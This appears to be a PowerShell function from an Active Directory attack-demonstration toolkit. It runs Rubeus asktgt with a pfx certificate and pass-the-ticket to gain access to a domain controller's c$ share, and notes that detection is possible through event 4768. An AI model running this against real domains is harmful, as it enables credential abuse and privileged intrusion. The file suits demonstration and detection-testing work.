Private/Get-KerberosTGT.ps1
|
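function Get-KerberosTGT {
    <#
    .SYNOPSIS
        Requests a Kerberos ticket-granting ticket (TGT) with a pfx certificate
        via Rubeus and shows access to the DC's c$ share before and after.

    .DESCRIPTION
        Steps, in order:
          1. List \\<$Script:ASDC>\c$ with Get-DirContent (the "before" state).
          2. Print the Rubeus command line for the operator, then run
             Rubeus.exe asktgt from $Script:ASTools with /ptt and aes256.
          3. List the same share again (the "after" state) and run klist.
          4. Log the certificate argument and the run time.

        The function pauses between steps unless $UnAttended is set, and
        clears the screen unless $SkipClearHost is set. Both variables, and
        the colour variables $fgcC / $fgcS / $fgcV, are not defined here and
        are resolved from an enclosing scope.

    .PARAMETER pfxFile
        Passed unchanged to Rubeus as the /certificate: value and written to
        the log afterwards.

    .PARAMETER altname
        Accepted for interface compatibility; not referenced in this function.

    .NOTES
        Because the request uses /ptt, the returned ticket is placed in the
        current logon session and stays there after this function returns;
        nothing here purges it. The trailing klist call shows the session's
        ticket cache, and its output is emitted as function output (it is not
        piped to Out-Host like the Rubeus call).

        Detection side: a TGT request is recorded on the domain controller as
        event 4768 when Kerberos authentication auditing is enabled, so this
        step is a convenient point to confirm that certificate-based TGT
        requests are visible to monitoring.
    #>
    Param([string] $pfxFile, [string] $altname)

    $CurrentFunction = Get-FunctionName
    Write-Log -Message "### Start Function $CurrentFunction ###"
    $StartRunTime = (Get-Date).ToString($Script:DateFormatLog)

    #################### main code | out- host ##################

    # Shared banner rule and target share; both are identical for every step.
    $separator = "____________________________________________________________________`n"
    $directory = "\\$Script:ASDC\c$"

    # --- Step 1: baseline access check against the DC share ---
    If (-not $SkipClearHost) { Clear-Host }
    Write-Host $separator
    Write-Host " FIRST try to connect to a DC c$ share "
    Write-Host $separator
    Get-DirContent -Path $directory
    If (-not $UnAttended) { pause }

    # --- Step 2: show, then run, the certificate-based TGT request ---
    If (-not $SkipClearHost) { Clear-Host }
    Write-Host $separator
    Write-Host " Request a ticket-granting ticket (TGT) by using the pfx certificate"
    Write-Host $separator

    $domain = $Script:AlternativeUser.FQDN
    $user = $Script:AlternativeUser.UPN

    Invoke-Output -Type CodeSnippet -Message "Command:"

    # Display-only rendering of the command. The certificate element is a
    # truncated placeholder whose literal spans a line break, kept exactly as
    # in the original. The last element previously read "/ppt", which did not
    # match the "/ptt" switch actually executed below; the display now agrees
    # with the executed command.
    $snippetText = " .\Rubeus.exe ", "asktgt /user:", "$user", " /domain:", "$domain", " /certificate:", "MIACAQMwgAYJKoZ [..] 
AAAAA=", " /ptt /enctype:aes256"
    $snippetColor = $fgcC, $fgcS, $fgcV , $fgcS, $fgcV, $fgcS, $fgcV, $fgcS
    Write-Highlight -Text $snippetText -Color $snippetColor
    Write-Host ""
    If (-not $UnAttended) { pause }

    # Rubeus output is forced to the host so it is not captured as function output.
    Invoke-Command -ScriptBlock {
        & "$($Script:ASTools)\Rubeus.exe" asktgt /user:$user /domain:$domain /certificate:$pfxFile /ptt /enctype:aes256
    } | Out-Host
    If (-not $UnAttended) { pause }

    # --- Step 3: repeat the access check with the new ticket in the session ---
    Write-Host $separator
    Write-Host " Now try again to connect to a DC c$ share "
    Write-Host $separator
    Get-DirContent -Path $directory
    If (-not $UnAttended) { pause }

    If (-not $SkipClearHost) { Clear-Host }
    klist
    If (-not $UnAttended) { pause }

    # NOTE(review): this writes the raw /certificate: argument to the log. If
    # callers pass base64 pfx content rather than a file path (the placeholder
    # shown above suggests that form is possible), the log would then contain
    # certificate and key material - confirm against the caller.
    Write-Log -Message " >> using $PfxFile"

    ######################## main code ############################
    $runtime = Get-RunTime -StartRunTime $StartRunTime
    Write-Log -Message " Run Time: $runtime [h] ###"
    Write-Log -Message "### End Function $CurrentFunction ###"
}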